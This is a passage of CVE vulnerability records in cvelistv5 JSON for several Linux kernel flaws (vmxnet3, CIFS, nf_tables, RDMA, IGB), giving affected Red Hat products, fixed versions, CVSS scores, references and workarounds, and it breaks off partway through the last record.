| Red Hat | Red Hat Enterprise Linux 8.2 Advanced Update Support |
Unaffected: 0:4.18.0-193.133.1.el8_2 < * cpe:/o:redhat:rhel_e4s:8.2::baseos cpe:/o:redhat:rhel_tus:8.2::baseos cpe:/o:redhat:rhel_aus:8.2::baseos |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:31:05.495Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0412",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0412"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:2006",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2006"
},
{
"name": "RHSA-2024:2008",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2008"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-4459"
},
{
"name": "RHBZ#2219268",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219268"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/edf410cb74dc612fd47ef5be319c5a0bcd6e6ccd"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.2::realtime",
"cpe:/a:redhat:rhel_tus:8.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.rt13.184.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.4::nfv",
"cpe:/a:redhat:rhel_tus:8.4::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.rt7.201.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.87.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::appstream",
"cpe:/o:redhat:rhel_eus:9.0::baseos",
"cpe:/a:redhat:rhel_eus:9.0::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.2.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::realtime",
"cpe:/a:redhat:rhel_eus:9.0::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.1.rt21.165.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.87.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2022-05-14T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T00:05:41.525Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0412",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0412"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:2006",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2006"
},
{
"name": "RHSA-2024:2008",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2008"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-4459"
},
{
"name": "RHBZ#2219268",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219268"
},
{
"url": "https://github.com/torvalds/linux/commit/edf410cb74dc612fd47ef5be319c5a0bcd6e6ccd"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-06-28T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2022-05-14T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: vmxnet3: null pointer dereference in vmxnet3_rq_cleanup()",
"workarounds": [
{
"lang": "en",
"value": "In order to mitigate this issue, prevent the affected code from being loaded by blacklisting the kernel module \"vmxnet3\". For instructions relating to how to blacklist a kernel module refer to: https://access.redhat.com/solutions/41278\n~~~\nExploiting this flaw will require CAP_NET_ADMIN access privilege in any user or network namespace.\n~~~"
}
],
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-4459",
"datePublished": "2023-08-21T18:49:13.172Z",
"dateReserved": "2023-08-21T16:21:49.200Z",
"dateUpdated": "2025-10-10T00:05:41.525Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-1192 (GCVE-0-2023-1192)
Vulnerability from cvelistv5
Published
2023-11-01 19:01
Modified
2025-02-27 20:36
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free flaw was found in smb2_is_status_io_timeout() in CIFS in the Linux Kernel. After CIFS transfers response data to a system call, there are still local variable points to the memory region, and if the system call frees it faster than CIFS uses it, CIFS will access a free memory region, leading to a denial of service.
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| n/a | kernel | |||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T05:40:59.686Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-1192"
},
{
"name": "RHBZ#2154178",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2154178"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d527f51331cace562393a8038d870b3e9916686f"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-1192",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-26T21:48:41.125231Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T20:36:33.776Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "affected",
"product": "kernel",
"vendor": "n/a"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://packages.fedoraproject.org/",
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Fedora",
"vendor": "Fedora"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Pumpkin (@u1f383), working with DEVCORE Internship Program for reporting this issue."
}
],
"datePublic": "2022-10-02T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free flaw was found in smb2_is_status_io_timeout() in CIFS in the Linux Kernel. After CIFS transfers response data to a system call, there are still local variable points to the memory region, and if the system call frees it faster than CIFS uses it, CIFS will access a free memory region, leading to a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Low"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-03-07T16:42:37.540Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-1192"
},
{
"name": "RHBZ#2154178",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2154178"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d527f51331cace562393a8038d870b3e9916686f"
}
],
"timeline": [
{
"lang": "en",
"time": "2022-12-16T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2022-10-02T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Use-after-free in smb2_is_status_io_timeout()",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-416: Use After Free"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-1192",
"datePublished": "2023-11-01T19:01:47.336Z",
"dateReserved": "2023-03-06T08:43:46.689Z",
"dateUpdated": "2025-02-27T20:36:33.776Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6817 (GCVE-0-2023-6817)
Vulnerability from cvelistv5
Published
2023-12-18 14:37
Modified
2025-02-13 17:26
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free.
We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:42:08.222Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/22/6"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/22/13"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.7",
"status": "affected",
"version": "5.6",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Lonial Kong"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Xingyuan Mo"
}
],
"datePublic": "2023-12-06T16:14:37.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free.\n\nWe recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-02-08T16:05:57.106Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a"
},
{
"url": "https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/22/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/22/13"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
},
{
"url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-6817",
"datePublished": "2023-12-18T14:37:05.986Z",
"dateReserved": "2023-12-14T11:29:13.252Z",
"dateUpdated": "2025-02-13T17:26:33.238Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-2176 (GCVE-0-2023-2176)
Vulnerability from cvelistv5
Published
2023-04-20 00:00
Modified
2025-05-05 16:01
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:12:20.598Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/linux-rdma/msg114749.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230609-0005/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-2176",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-23T13:28:34.519474Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-05T16:01:21.860Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux 6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-06-09T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://www.spinics.net/lists/linux-rdma/msg114749.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230609-0005/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-2176",
"datePublished": "2023-04-20T00:00:00.000Z",
"dateReserved": "2023-04-19T00:00:00.000Z",
"dateUpdated": "2025-05-05T16:01:21.860Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-45871 (GCVE-0-2023-45871)
Vulnerability from cvelistv5
Published
2023-10-15 00:00
Modified
2024-08-02 20:29
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU.
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T20:29:32.566Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
